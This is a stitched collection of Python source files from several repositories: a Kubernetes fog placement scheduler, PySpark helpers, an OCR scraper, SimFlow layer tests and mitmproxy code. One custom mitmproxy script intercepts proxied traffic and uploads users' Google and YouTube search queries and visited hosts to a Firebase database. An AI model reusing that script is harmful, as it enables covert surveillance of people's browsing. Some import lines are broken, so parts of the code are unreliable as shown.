placement_policy == 'most_traffic' or placement_policy == 'most-traffic': for cluster in eligible_clusters: if mode == 'create': query = "sum(instance:node_network_receive_bytes_excluding_lo:rate1m{cluster_name='" + cluster['name'] + "'})" elif mode == 'update': query = "sum(irate(container_network_receive_bytes_total{cluster_name='" + cluster['name'] + "', namespace='" + app_namespace + "', pod=~'frontend.*'}[60s]))" # Here, we are fetching the values of a particular metric name result = pc.custom_query(query=query) #cluster_network_receive[cluster['name']] = float(result[0]['value'][1]) if len(result) > 0: cluster['ntk_rcv'] = float(result[0]['value'][1]) else: cluster['ntk_rcv'] = 0.0 # sorted_dict = dict(sorted(cluster_network_receive.items(), # key=operator.itemgetter(1), # reverse=True)) sorted_eligible_clusters = sorted(eligible_clusters, key = lambda i: i['ntk_rcv'], reverse=True) elif placement_policy == 'worst_fit' or placement_policy == 'worst-fit': sorted_eligible_clusters = sorted(eligible_clusters, key=lambda i: i['max_replicas'], reverse=True) elif placement_policy == 'best_fit' or placement_policy == 'best-fit': sorted_eligible_clusters = sorted(eligible_clusters, key=lambda i: i['max_replicas']) print("List of sorted traffic and policy ....", sorted_eligible_clusters) fogapp_locations = [] for cluster in sorted_eligible_clusters: dict = {} dict['name'] = cluster['name'] dict['max_replicas'] = cluster['max_replicas'] fogapp_locations.append(dict) # for key in sorted_dict: # fogapp_locations.append(key) all_clusters = get_all_federation_clusters() # if 'cloud' in all_clusters: # fogapp_locations.append('cloud') for cluster in all_clusters: if 'cloud' in cluster: dict = {} dict['name'] = cluster dict['max_replicas'] = replicas fogapp_locations.append(dict) print("Final list of clusters which will host the app in the Default case ....", fogapp_locations) #fogapp_locations = fogapp_locations[:clusters_qty] return fogapp_locations def getFogAppClusters(name, namespace): config.load_kube_config() api = client.CustomObjectsApi() group = '' version = 'v1' namespace = namespace plural = 'multiclusterdeployments' current_clusters = [] original_clusters = [] api_response = api.list_namespaced_custom_object(group=group, version=version, namespace=namespace, plural=plural) for item in api_response['items']: if item['metadata']['name'] == name: original_clusters = item['status']['create_fn']['fogapp_locations'] if 'update_fn' in item['status']: current_clusters = item['status']['update_fn']['fogapp_locations'] else: current_clusters = item['status']['create_fn']['fogapp_locations'] return current_clusters, original_clusters def getServiceClusters(name, namespace): config.load_kube_config() api = client.CustomObjectsApi() group = '' version = 'v1' namespace = namespace plural = 'multiclusterservices' current_clusters = [] original_clusters = [] api_response = api.list_namespaced_custom_object(group=group, version=version, namespace=namespace, plural=plural) for item in api_response['items']: if item['metadata']['name'] == name: if item['status'] != "": if 'create_fn' in item['status']: original_clusters = item['status']['create_fn']['fogapp_locations'] if 'update_fn' in item['status']: current_clusters = item['status']['update_fn']['fogapp_locations'] elif 'create_fn' in item['status']: current_clusters = item['status']['create_fn']['fogapp_locations'] return current_clusters, original_clusters def getCloudCluster(): all_clusters = get_all_federation_clusters() cloud_cluster = '' for cluster in all_clusters: if 'cloud' in cluster: cloud_cluster = cluster return cloud_cluster def createDeployment(cluster, deployment_body, namespace): core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.create_namespaced_deployment(namespace=namespace, body=deployment_body, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when creating Deployment on " + cluster ) def createService(cluster, service_body, namespace): core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.create_namespaced_service(namespace=namespace, body=service_body, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when creating Service on " + cluster) def deleteDeployment(cluster, deployment_name, namespace): core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.delete_namespaced_deployment(namespace=namespace, name=deployment_name, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when deleting Deployment from " + cluster) def deleteService(cluster, service_name, namespace): core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.delete_namespaced_service(namespace=namespace, name=service_name, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when deleting Service from " + cluster) def patchDeployment(cluster, deployment_name, deployment_body, namespace): core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.patch_namespaced_deployment(namespace=namespace, name=deployment_name, body=deployment_body, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when patching Deployment on " + cluster) def patchService(cluster, service_name, service_body, namespace): core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.patch_namespaced_service(namespace=namespace, name=service_name, body=service_body, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when patching Service on " + cluster) def createJob(cluster, job_body, namespace): core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.create_namespaced_job(namespace=namespace, body=job_body, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when creating Job on " + cluster) def patchJob(cluster, fogapp_name, job_body, namespace): core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.patch_namespaced_job(namespace=namespace, name=fogapp_name, body=job_body, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when patching Job on " + cluster) def deleteJob(cluster, fogapp_name, namespace): core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster)) try: core_v1.delete_namespaced_job(namespace=namespace, name=fogapp_name, _request_timeout=timeout) except: print("Connection timeout after " + str(timeout) + " seconds when deleting Job from " + cluster) ```
{ "source": "00anupam00/comparative-analysis", "score": 3 }
#### File: src/binary/ ```python from pyspark.sql import dataframe from src.utils.Utils import generate_id def attach_labels(df_data_id, df_labels): # JOIN df = df_data_id.join(df_labels, on=["id"], how="inner") return df def pre_process_data(df_data: dataframe, df_labels: dataframe): df_data_id = generate_id(df_data) df = attach_labels(df_data_id, df_labels) return df ``` #### File: src/multiclass/ ```python from import MulticlassClassificationEvaluator from pyspark.sql import dataframe def evaluate_multiclass(df: dataframe.DataFrame): # Select (prediction, true label) and compute test error evaluator = MulticlassClassificationEvaluator(labelCol="label", predictionCol="prediction") accuracy = evaluator.evaluate(df, {evaluator.metricName: "accuracy"}) weightedPrecision = evaluator.evaluate(df, {evaluator.metricName: "weightedPrecision"}) weightedFMeasure = evaluator.evaluate(df, {evaluator.metricName: "weightedFMeasure"}) # fMeasureByLabel = evaluator.evaluate(df, {evaluator.metricName: "fMeasureByLabel"}) weightedRecall = evaluator.evaluate(df, {evaluator.metricName: "weightedRecall"}) weightedFalsePositiveRate = evaluator.evaluate(df, {evaluator.metricName: "weightedFalsePositiveRate"}) weightedTruePositiveRate = evaluator.evaluate(df, {evaluator.metricName: "weightedTruePositiveRate"}) print("Test Error = %g \nAccuracy: %s \nFPR: %s\nTPR: %s\nF-measure: %s\nPrecision: %s\nRecall: %s" % ((1.0 - accuracy), accuracy*100, weightedFalsePositiveRate, weightedTruePositiveRate, weightedFMeasure, weightedPrecision, weightedRecall)) ``` #### File: src/multiclass/ ```python from pyspark.sql.functions import regexp_replace, when, lit from pyspark.sql.types import StructType, StructField, LongType, IntegerType, StringType from src.SparkConfig import get_spark_session from src.binary.PrePocessor import pre_process_data spark = get_spark_session("comparative-analysis") def load_data(data_path, labels_path, multiclass_param): df_data = data_path, format="csv", sep=",", inferSchema="true", header="false") print("Loaded dataset. ") labels_schema = StructType([StructField("id", LongType(), False), StructField("label", IntegerType(), False)]) df_labels = labels_path, format="csv", sep=",", inferSchema="false", schema=labels_schema, mode="DROPMALFORMED", header="true") df_labels = df_labels.withColumn('label', when(df_labels.label == 1, lit(multiclass_param)).otherwise(lit(0))) print("Loaded labels. ")"id", "label").orderBy('id', ascending=False).show() # Pass through data pre-processor df = pre_process_data(df_data, df_labels) return df def show(df): df.describe().show(25) print("The last 10 lines of the dataset: ") print(df.tail(10)) ``` #### File: comparative-analysis/src/ ```python from pyspark.sql import SparkSession def get_spark_session(appName): return SparkSession.builder.appName(appName).getOrCreate() ```
{ "source": "00archer0/Dataminig", "score": 3 }
#### File: 00archer0/Dataminig/ ```python import pandas as pd import re import urllib import requests from urllib.request import urlretrieve from wand.image import Image import io import os import six from import vision from import translate from import types import json client = vision.ImageAnnotatorClient() target = 'en' final = '' counter = [] station = pd.read_excel('polling_station.xlsx') link = '' link_part = 'CMB02/CMB0020022.PDF' url = link+link_part item = [(3400,300,3800,500),(450,1970,2480,3850),(870,4070,2700,4300),(870,4330,2700,4500), (3100,2900,3800,3050),(3120,3780,3800,3860),(1300,4980,2000,5250)] def get_pic(sample_pdf,area): img = sample_pdf.clone() img.crop(*area) return img.make_blob('JPEG') for x in range(1,21): num = re.findall(r'\d+',station.AC[x]) first_part = 'CMB' + num[0] print('here') final = '' for p in range(1,station['polling_station'][x])+1: print(str(p) +' next here') sec_part = 'CMB'+ str(num[0]).zfill(3) + str(p).zfill(4) path = first_part + '_' + sec_part +'.pdf' url = link + first_part + '/' + sec_part +'.PDF' fetched_item = '' sample_pdf = Image(filename=path+"[0]", resolution=500) for t in item: print(t) content = get_pic(sample_pdf,t) image = types.Image(content= content) image_context = vision.types.ImageContext(language_hints=['hi']) response = client.document_text_detection(image=image) texts = response.text_annotations texts = texts[0].description.replace('\n',' ') fetched_item = fetched_item+texts+' ~ ' print(fetched_item) final = final+fetched_item+'\n' '''final.append(str(fetched_item)) print(final) to_save = pd.DataFrame(final) to_save.to_csv('fin.csv',index=False,encoding='utf-8',header=False) ''' with open(station['AC'][x]+'.txt','w+',encoding='utf-8') as file: file.write(final) print(counter.count(1)) print('here') ```
{ "source": "00arun00/SimFlow", "score": 4 }
#### File: simflow/utils/ ```python import numpy as np def numerical_gradient_array(f, x, df, h=1e-5): """ Evaluate a numeric gradient for a function that accepts a numpy array and returns a numpy array. Args: f (function): function that is passed to compute gradient for x (numpy.ndarray): input to function df (numpy.ndarray): output gradient h (float): delta around which gradient is calculated Returns: grad (numpy.ndarray): computed numeric gradient """ grad = np.zeros_like(x) it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite']) while not it.finished: ix = it.multi_index oldval = x[ix] x[ix] = oldval + h pos = f(x).copy() x[ix] = oldval - h neg = f(x).copy() x[ix] = oldval grad[ix] = np.sum((pos - neg) * df) / (2 * h) it.iternext() return grad ``` #### File: SimFlow/tests/ ```python import numpy as np from simflow.layers.convolutional import Conv2D from simflow.utils.grad_check_utils import numerical_gradient_array from simflow.utils.im2col import im2col_indices from unittest import TestCase class TestConv(TestCase): @staticmethod def standard_forward(X, w, b, padding, stride): n_x, d_x, h_x, w_x = X.shape n_filters, d_filter, h_filter, w_filter = w.shape h_out = (h_x - h_filter + 2 * padding) // stride + 1 w_out = (w_x - w_filter + 2 * padding) // stride + 1 X_col = im2col_indices(X, h_filter, w_filter, padding=padding, stride=stride) W_col = w.reshape(n_filters, -1) out = W_col @ X_col + b out = out.reshape(n_filters, h_out, w_out, n_x) out = out.transpose(3, 0, 1, 2) return out def test_conv_layer_forward_prop(self): eps = 1e-8 batch_size = 32 filter_size = 3 h_x, w_x = 7, 7 inChannels = 3 n_filter = 5 padding = 1 stride = 1 x = np.random.randn(batch_size, inChannels, h_x, w_x) w = np.random.randn(n_filter, inChannels, filter_size, filter_size) b = np.random.randn(n_filter, 1) c_layer = Conv2D(inChannels=inChannels, outChannels=n_filter, filter_size=filter_size, stride=stride, padding=padding, trainable=True) c_layer.W = w c_layer.b = b out = c_layer.forward(x) out_standard = self.standard_forward(x, w, b, padding, stride) assert np.allclose(out, out_standard, atol=eps) def test_conv_layer_back_prop(self): eps = 1e-7 batch_size = 32 filter_size = 3 h_x, w_x = 7, 7 inChannels = 3 n_filter = 5 padding = 1 stride = 1 h_out = (h_x - filter_size + 2*padding)//stride + 1 w_out = (w_x - filter_size + 2*padding)//stride + 1 x = np.random.randn(batch_size, inChannels, h_x, w_x) w = np.random.randn(n_filter, inChannels, filter_size, filter_size) b = np.random.randn(n_filter, 1) dout = np.random.randn(batch_size, n_filter, h_out, w_out) c_layer = Conv2D(inChannels=inChannels, outChannels=n_filter, filter_size=filter_size, stride=stride, padding=padding, trainable=True) c_layer.W = w c_layer.b = b dx_num = numerical_gradient_array(c_layer.forward, x, dout, h=eps) dw_num = numerical_gradient_array(lambda w: c_layer.forward(x), w, dout, h=eps) db_num = numerical_gradient_array(lambda b: c_layer.forward(x), b, dout, h=eps) dx, grads = c_layer.backward(dout) dw, db = grads[0][1], grads[1][1] assert np.allclose(dx, dx_num, atol=eps) assert np.allclose(dw, dw_num, atol=eps) assert np.allclose(db, db_num, atol=eps) ``` #### File: SimFlow/tests/ ```python import numpy as np from simflow.layers.convolutional import dilated_Conv2D from simflow.utils.grad_check_utils import numerical_gradient_array import unittest class TestDilatedConv(unittest.TestCase): def test_dilated_conv_layer_back_prop(self): eps = 1e-7 batch_size = 32 filter_size = 3 h_x, w_x = 7, 7 inChannels = 3 n_filter = 5 padding = 0 stride = 1 dilation = 2 new_filter_size = dilation*(filter_size-1)+1 h_out = (h_x - new_filter_size + 2*padding)//stride + 1 w_out = (w_x - new_filter_size + 2*padding)//stride + 1 x = np.random.randn(batch_size, inChannels, h_x, w_x) w = np.random.randn(n_filter, inChannels, filter_size, filter_size) b = np.random.randn(n_filter, 1) dout = np.random.randn(batch_size, n_filter, h_out, w_out) dc_layer = dilated_Conv2D(inChannels=inChannels, outChannels=n_filter, filter_size=filter_size, stride=stride, padding=padding, trainable=True) dc_layer.W = w dc_layer.b = b dx_num = numerical_gradient_array(dc_layer.forward, x, dout, h=eps) dw_num = numerical_gradient_array(lambda w: dc_layer.forward(x), w, dout, h=eps) db_num = numerical_gradient_array(lambda b: dc_layer.forward(x), b, dout, h=eps) dx, grads = dc_layer.backward(dout) dw, db = grads[0][1], grads[1][1] assert np.allclose(dx, dx_num, atol=eps) assert np.allclose(dw, dw_num, atol=eps) assert np.allclose(db, db_num, atol=eps) ```
{ "source": "00cool/mitmmyversion", "score": 2 }
#### File: 00cool/mitmmyversion/ ```python import pyrebase config = { "apiKey": "<KEY>", "authDomain": "", "databaseURL": "", "storageBucket": "", "serviceAccount": "/home/nick/Desktop/firebase/student-data-jump-firebase-adminsdk-zzb0l-cfaf56906d.json" } firebase = pyrebase.initialize_app(config) auth = firebase.auth() user = auth.sign_in_with_email_and_password("<EMAIL>","<PASSWORD>") user = auth.refresh(user['refreshToken']) user['idToken'] db = firebase.database() def sendDataToFire(data, sendTo): db.child(sendTo).push(data) ``` #### File: examples/simple/ ```python from mitmproxy import http import re import json import sys sys.path.append('../') from connect import sendDataToFire def request(flow: http.HTTPFlow) -> None: data = {} #data['time'] = flow.request.timestamp_start ###################################################################### if flow.request.url[:32] == "" and flow.request.method == 'GET' : #data['From'] = "Google search" s = flow.request.path s = s[s.find('q=')+2:] s = s[:s.find('&')] data['QueryG'] = s.replace('+', ' ') json_dg = json.dumps(data) sendDataToFire(json_dg, 'Google')#[data.find('&q=')+1: data.find('&')]) ######################################################################## elif (flow.request.url[:50] == "" and flow.request.method == 'GET'): ys = flow.request.path ys = ys[ys.find('q=')+2:] ys = ys[:ys.find('&')] data['QueryY'] = ys.replace('+', ' ') json_dy = json.dumps(data) sendDataToFire(json_dy, 'YouTube')#[data.find('&q=')+1: data.find('&')]) ###################################################################### else: if flow.request.method == 'GET': data['Website'] = json_dw = json.dumps(data) sendDataToFire(json_dw, 'Visited-websites') # data['url'] = flow.request.url # json_data = json.dumps(data) # sendDataToFire(json_data, 'Visited-websites') ``` #### File: tools/console/ ```python import re import urwid from import common from import signals from import statusbar from import flowlist from import flowview from import commands from import keybindings from import options from import overlay from import help from import grideditor from import eventlog class StackWidget(urwid.Frame): def __init__(self, window, widget, title, focus): self.is_focused = focus self.window = window if title: header = urwid.AttrWrap( urwid.Text(title), "heading" if focus else "heading_inactive" ) else: header = None super().__init__( widget, header=header ) def mouse_event(self, size, event, button, col, row, focus): if event == "mouse press" and button == 1 and not self.is_focused: self.window.switch() return super().mouse_event(size, event, button, col, row, focus) def keypress(self, size, key): # Make sure that we don't propagate cursor events outside of the widget. # Otherwise, in a horizontal layout, urwid's Pile would change the focused widget # if we cannot scroll any further. ret = super().keypress(size, key) command = self._command_map[ret] # awkward as they don't implement a full dict api if command and command.startswith("cursor"): return None return ret class WindowStack: def __init__(self, master, base): self.master = master = dict( flowlist = flowlist.FlowListBox(master), flowview = flowview.FlowView(master), commands = commands.Commands(master), keybindings = keybindings.KeyBindings(master), options = options.Options(master), help = help.HelpView(master), eventlog = eventlog.EventLog(master), edit_focus_query = grideditor.QueryEditor(master), edit_focus_cookies = grideditor.CookieEditor(master), edit_focus_setcookies = grideditor.SetCookieEditor(master), edit_focus_form = grideditor.RequestFormEditor(master), edit_focus_path = grideditor.PathEditor(master), edit_focus_request_headers = grideditor.RequestHeaderEditor(master), edit_focus_response_headers = grideditor.ResponseHeaderEditor(master), ) self.stack = [base] self.overlay = None def set_overlay(self, o, **kwargs): self.overlay = overlay.SimpleOverlay( self, o, self.top_widget(), o.width, **kwargs, ) def top_window(self): """ The current top window, ignoring overlays. """ return[self.stack[-1]] def top_widget(self): """ The current top widget - either a window or the active overlay. """ if self.overlay: return self.overlay return self.top_window() def push(self, wname): if self.stack[-1] == wname: return prev = self.top_window() self.stack.append(wname)"layout_pushed", prev) def pop(self, *args, **kwargs): """ Pop off the stack, return True if we're already at the top. """ if not self.overlay and len(self.stack) == 1: return True"layout_popping") if self.overlay: self.overlay = None else: self.stack.pop() def call(self, name, *args, **kwargs): """ Call a function on both the top window, and the overlay if there is one. If the widget has a key_responder, we call the function on the responder instead. """ getattr(self.top_window(), name)(*args, **kwargs) if self.overlay: getattr(self.overlay, name)(*args, **kwargs) class Window(urwid.Frame): def __init__(self, master): self.statusbar = statusbar.StatusBar(master) super().__init__( None, header = None, footer = urwid.AttrWrap(self.statusbar, "background") ) self.master = master self.master.view.sig_view_refresh.connect(self.view_changed) self.master.view.sig_view_add.connect(self.view_changed) self.master.view.sig_view_remove.connect(self.view_changed) self.master.view.sig_view_update.connect(self.view_changed) self.master.view.focus.sig_change.connect(self.view_changed) self.master.view.focus.sig_change.connect(self.focus_changed) signals.focus.connect(self.sig_focus) signals.flow_change.connect(self.flow_changed) signals.pop_view_state.connect(self.pop) signals.push_view_state.connect(self.push) self.master.options.subscribe(self.configure, ["console_layout"]) self.master.options.subscribe(self.configure, ["console_layout_headers"]) self.pane = 0 self.stacks = [ WindowStack(master, "flowlist"), WindowStack(master, "eventlog") ] def focus_stack(self): return self.stacks[self.pane] def configure(self, otions, updated): self.refresh() def refresh(self): """ Redraw the layout. """ c = self.master.options.console_layout if c == "single": self.pane = 0 def wrapped(idx): widget = self.stacks[idx].top_widget() if self.master.options.console_layout_headers: title = self.stacks[idx].top_window().title else: title = None return StackWidget( self, widget, title, self.pane == idx ) w = None if c == "single": w = wrapped(0) elif c == "vertical": w = urwid.Pile( [ wrapped(i) for i, s in enumerate(self.stacks) ], focus_item=self.pane ) else: w = urwid.Columns( [wrapped(i) for i, s in enumerate(self.stacks)], dividechars=1, focus_column=self.pane ) self.body = urwid.AttrWrap(w, "background") def flow_changed(self, sender, flow): if self.master.view.focus.flow: if == self.focus_changed() def focus_changed(self, *args, **kwargs): """ Triggered when the focus changes - either when it's modified, or when it changes to a different flow altogether. """ for i in self.stacks:"focus_changed") def view_changed(self, *args, **kwargs): """ Triggered when the view list has changed. """ for i in self.stacks:"view_changed") def set_overlay(self, o, **kwargs): """ Set an overlay on the currently focused stack. """ self.focus_stack().set_overlay(o, **kwargs) self.refresh() def push(self, wname): """ Push a window onto the currently focused stack. """ self.focus_stack().push(wname) self.refresh() self.view_changed() self.focus_changed() def pop(self, *args, **kwargs): """ Pop a window from the currently focused stack. If there is only one window on the stack, this prompts for exit. """ if self.focus_stack().pop(): self.master.prompt_for_exit() else: self.refresh() self.view_changed() self.focus_changed() def stacks_sorted_by_focus(self): """ Returns: self.stacks, with the focused stack first. """ stacks = self.stacks.copy() stacks.insert(0, stacks.pop(self.pane)) return stacks def current(self, keyctx): """ Returns the active widget with a matching key context, including overlays. If multiple stacks have an active widget with a matching key context, the currently focused stack is preferred. """ for s in self.stacks_sorted_by_focus(): t = s.top_widget() if t.keyctx == keyctx: return t def current_window(self, keyctx): """ Returns the active window with a matching key context, ignoring overlays. If multiple stacks have an active widget with a matching key context, the currently focused stack is preferred. """ for s in self.stacks_sorted_by_focus(): t = s.top_window() if t.keyctx == keyctx: return t def sig_focus(self, sender, section): self.focus_position = section def switch(self): """ Switch between the two panes. """ if self.master.options.console_layout == "single": self.pane = 0 else: self.pane = (self.pane + 1) % len(self.stacks) self.refresh() def mouse_event(self, *args, **kwargs): # args: (size, event, button, col, row) k = super().mouse_event(*args, **kwargs) if not k: if args[1] == "mouse drag": signals.status_message.send( message = "Hold down fn, shift, alt or ctrl to select text or use the --no-mouse parameter.", expire = 1 ) elif args[1] == "mouse press" and args[2] == 4: self.keypress(args[0], "up") elif args[1] == "mouse press" and args[2] == 5: self.keypress(args[0], "down") else: return False return True def keypress(self, size, k): k = super().keypress(size, k) if k: return self.master.keymap.handle( self.focus_stack().top_widget().keyctx, k ) class Screen(urwid.raw_display.Screen): def write(self, data): if common.IS_WSL: # replace urwid's SI/SO, which produce artifacts under WSL. # at some point we may figure out what they actually do. data = re.sub("[\x0e\x0f]", "", data) super().write(data) ```
{ "source": "00cool/project-X", "score": 2 }
#### File: examples/simple/ ```python from mitmproxy import ctx def load(l):"Registering option 'custom'") l.add_option("custom", bool, False, "A custom option") def configure(updated): if "custom" in updated:"custom option value: %s" % ctx.options.custom) ``` #### File: mitmproxy/addons/ ```python from mitmproxy import ctx class AntiComp: def request(self, flow): if ctx.options.anticomp: flow.request.anticomp() ``` #### File: mitmproxy/addons/ ```python import mitmproxy class CheckCA: def __init__(self): self.failed = False def configure(self, updated): has_ca = ( mitmproxy.ctx.master.server and mitmproxy.ctx.master.server.config and mitmproxy.ctx.master.server.config.certstore and mitmproxy.ctx.master.server.config.certstore.default_ca ) if has_ca: self.failed = mitmproxy.ctx.master.server.config.certstore.default_ca.has_expired() if self.failed: mitmproxy.ctx.master.add_log( "The mitmproxy certificate authority has expired!\n" "Please delete all CA-related files in your ~/.mitmproxy folder.\n" "The CA will be regenerated automatically after restarting mitmproxy.\n" "Then make sure all your clients have the new CA installed.", "warn", ) ``` #### File: mitmproxy/addons/ ```python from mitmproxy import ctx class KeepServing: def event_processing_complete(self): if not ctx.master.options.keepserving: ctx.master.shutdown() ``` #### File: net/http/ ```python import email.utils import re import time from typing import Tuple, List, Iterable from mitmproxy.coretypes import multidict """ A flexible module for cookie parsing and manipulation. This module differs from usual standards-compliant cookie modules in a number of ways. We try to be as permissive as possible, and to retain even mal-formed information. Duplicate cookies are preserved in parsing, and can be set in formatting. We do attempt to escape and quote values where needed, but will not reject data that violate the specs. Parsing accepts the formats in RFC6265 and partially RFC2109 and RFC2965. We also parse the comma-separated variant of Set-Cookie that allows multiple cookies to be set in a single header. Serialization follows RFC6265. """ _cookie_params = {'expires', 'path', 'comment', 'max-age', 'secure', 'httponly', 'version'} ESCAPE = re.compile(r"([\"\\])") class CookieAttrs(multidict.MultiDict): @staticmethod def _kconv(key): return key.lower() @staticmethod def _reduce_values(values): # See the StickyCookieTest for a weird cookie that only makes sense # if we take the last part. return values[-1] TSetCookie = Tuple[str, str, CookieAttrs] TPairs = List[List[str]] # TODO: Should be List[Tuple[str,str]]? def _read_until(s, start, term): """ Read until one of the characters in term is reached. """ if start == len(s): return "", start + 1 for i in range(start, len(s)): if s[i] in term: return s[start:i], i return s[start:i + 1], i + 1 def _read_quoted_string(s, start): """ start: offset to the first quote of the string to be read A sort of loose super-set of the various quoted string specifications. RFC6265 disallows backslashes or double quotes within quoted strings. Prior RFCs use backslashes to escape. This leaves us free to apply backslash escaping by default and be compatible with everything. """ escaping = False ret = [] # Skip the first quote i = start # initialize in case the loop doesn't run. for i in range(start + 1, len(s)): if escaping: ret.append(s[i]) escaping = False elif s[i] == '"': break elif s[i] == "\\": escaping = True else: ret.append(s[i]) return "".join(ret), i + 1 def _read_key(s, start, delims=";="): """ Read a key - the LHS of a token/value pair in a cookie. """ return _read_until(s, start, delims) def _read_value(s, start, delims): """ Reads a value - the RHS of a token/value pair in a cookie. """ if start >= len(s): return "", start elif s[start] == '"': return _read_quoted_string(s, start) else: return _read_until(s, start, delims) def _read_cookie_pairs(s, off=0): """ Read pairs of lhs=rhs values from Cookie headers. off: start offset """ pairs = [] while True: lhs, off = _read_key(s, off) lhs = lhs.lstrip() if lhs: rhs = None if off < len(s) and s[off] == "=": rhs, off = _read_value(s, off + 1, ";") pairs.append([lhs, rhs]) off += 1 if not off < len(s): break return pairs, off def _read_set_cookie_pairs(s: str, off=0) -> Tuple[List[TPairs], int]: """ Read pairs of lhs=rhs values from SetCookie headers while handling multiple cookies. off: start offset specials: attributes that are treated specially """ cookies = [] # type: List[TPairs] pairs = [] # type: TPairs while True: lhs, off = _read_key(s, off, ";=,") lhs = lhs.lstrip() if lhs: rhs = None if off < len(s) and s[off] == "=": rhs, off = _read_value(s, off + 1, ";,") # Special handliing of attributes if lhs.lower() == "expires": # 'expires' values can contain commas in them so they need to # be handled separately. # We actually bank on the fact that the expires value WILL # contain a comma. Things will fail, if they don't. # '3' is just a heuristic we use to determine whether we've # only read a part of the expires value and we should read more. if len(rhs) <= 3: trail, off = _read_value(s, off + 1, ";,") rhs = rhs + "," + trail pairs.append([lhs, rhs]) # comma marks the beginning of a new cookie if off < len(s) and s[off] == ",": cookies.append(pairs) pairs = [] off += 1 if not off < len(s): break if pairs or not cookies: cookies.append(pairs) return cookies, off def _has_special(s: str) -> bool: for i in s: if i in '",;\\': return True o = ord(i) if o < 0x21 or o > 0x7e: return True return False def _format_pairs(pairs, specials=(), sep="; "): """ specials: A lower-cased list of keys that will not be quoted. """ vals = [] for k, v in pairs: if v is None: vals.append(k) else: if k.lower() not in specials and _has_special(v): v = ESCAPE.sub(r"\\\1", v) v = '"%s"' % v vals.append("%s=%s" % (k, v)) return sep.join(vals) def _format_set_cookie_pairs(lst): return _format_pairs( lst, specials=("expires", "path") ) def parse_cookie_header(line): """ Parse a Cookie header value. Returns a list of (lhs, rhs) tuples. """ pairs, off_ = _read_cookie_pairs(line) return pairs def parse_cookie_headers(cookie_headers): cookie_list = [] for header in cookie_headers: cookie_list.extend(parse_cookie_header(header)) return cookie_list def format_cookie_header(lst): """ Formats a Cookie header value. """ return _format_pairs(lst) def parse_set_cookie_header(line: str) -> List[TSetCookie]: """ Parse a Set-Cookie header value Returns: A list of (name, value, attrs) tuples, where attrs is a CookieAttrs dict of attributes. No attempt is made to parse attribute values - they are treated purely as strings. """ cookie_pairs, off = _read_set_cookie_pairs(line) cookies = [] for pairs in cookie_pairs: if pairs: cookie, *attrs = pairs cookies.append(( cookie[0], cookie[1], CookieAttrs(attrs) )) return cookies def parse_set_cookie_headers(headers: Iterable[str]) -> List[TSetCookie]: rv = [] for header in headers: cookies = parse_set_cookie_header(header) rv.extend(cookies) return rv def format_set_cookie_header(set_cookies: List[TSetCookie]) -> str: """ Formats a Set-Cookie header value. """ rv = [] for name, value, attrs in set_cookies: pairs = [(name, value)] pairs.extend( attrs.fields if hasattr(attrs, "fields") else attrs ) rv.append(_format_set_cookie_pairs(pairs)) return ", ".join(rv) def refresh_set_cookie_header(c: str, delta: int) -> str: """ Args: c: A Set-Cookie string delta: Time delta in seconds Returns: A refreshed Set-Cookie string Raises: ValueError, if the cookie is invalid. """ cookies = parse_set_cookie_header(c) for cookie in cookies: name, value, attrs = cookie if not name or not value: raise ValueError("Invalid Cookie") if "expires" in attrs: e = email.utils.parsedate_tz(attrs["expires"]) if e: f = email.utils.mktime_tz(e) + delta attrs.set_all("expires", [email.utils.formatdate(f)]) else: # This can happen when the expires tag is invalid. # sends a an expires tag like this: "Thu, 31 Dec # 2037 23:59:59 GMT", which is valid RFC 1123, but not # strictly correct according to the cookie spec. Browsers # appear to parse this tolerantly - maybe we should too. # For now, we just ignore this. del attrs["expires"] return format_set_cookie_header(cookies) def get_expiration_ts(cookie_attrs): """ Determines the time when the cookie will be expired. Considering both 'expires' and 'max-age' parameters. Returns: timestamp of when the cookie will expire. None, if no expiration time is set. """ if 'expires' in cookie_attrs: e = email.utils.parsedate_tz(cookie_attrs["expires"]) if e: return email.utils.mktime_tz(e) elif 'max-age' in cookie_attrs: try: max_age = int(cookie_attrs['Max-Age']) except ValueError: pass else: now_ts = time.time() return now_ts + max_age return None def is_expired(cookie_attrs): """ Determines whether a cookie has expired. Returns: boolean """ exp_ts = get_expiration_ts(cookie_attrs) now_ts = time.time() # If no expiration information was provided with the cookie if exp_ts is None: return False else: return exp_ts <= now_ts def group_cookies(pairs): """ Converts a list of pairs to a (name, value, attrs) for each cookie. """ if not pairs: return [] cookie_list = [] # First pair is always a new cookie name, value = pairs[0] attrs = [] for k, v in pairs[1:]: if k.lower() in _cookie_params: attrs.append((k, v)) else: cookie_list.append((name, value, CookieAttrs(attrs))) name, value, attrs = k, v, [] cookie_list.append((name, value, CookieAttrs(attrs))) return cookie_list ``` #### File: tools/web/ ```python import webbrowser import tornado.httpserver import tornado.ioloop from mitmproxy import addons from mitmproxy import log from mitmproxy import master from mitmproxy import optmanager from mitmproxy.addons import eventstore from mitmproxy.addons import intercept from mitmproxy.addons import readfile from mitmproxy.addons import termlog from mitmproxy.addons import view from mitmproxy.addons import termstatus from import app, webaddons, static_viewer class WebMaster(master.Master): def __init__(self, options, with_termlog=True): super().__init__(options) self.view = view.View() self.view.sig_view_add.connect(self._sig_view_add) self.view.sig_view_remove.connect(self._sig_view_remove) self.view.sig_view_update.connect(self._sig_view_update) self.view.sig_view_refresh.connect(self._sig_view_refresh) = eventstore.EventStore() 